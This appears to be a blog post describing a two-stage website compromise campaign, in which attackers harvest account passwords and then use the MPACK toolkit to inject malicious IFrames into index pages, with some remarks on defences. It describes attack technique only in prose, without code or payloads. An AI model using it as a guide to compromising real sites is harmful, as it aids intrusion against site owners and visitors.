It looks like the attack usually has two stages.
• Account passwords harvesting. On the first state they collect passwords for the accounts. We can call this stage "account passwords harvesting". Details on how they do that are fuzzy. The truth is that on a typical Linux server it might enough to get just one user account password to be in a reasonably good position to get the root via some king of little known or unpatched exploit. Zones and jails are better in this respect as they protect other users from easily compromised "suckers" who happily use passwords like 123456 or use infected with spyware PCs at home. Actually the complexity of the password should be beefed up to at least 8 characters. But this does not help if the user computer is infected with a keylogger. ISPs need to handle vastly difference classes of users and security is always as good as the weakest link.
• On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (ie. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document. That might be because of different tools of different version/modes of work of MPACK. But there are other cases when all documents were modified by replacing HEAD tag
0 comments:
Post a Comment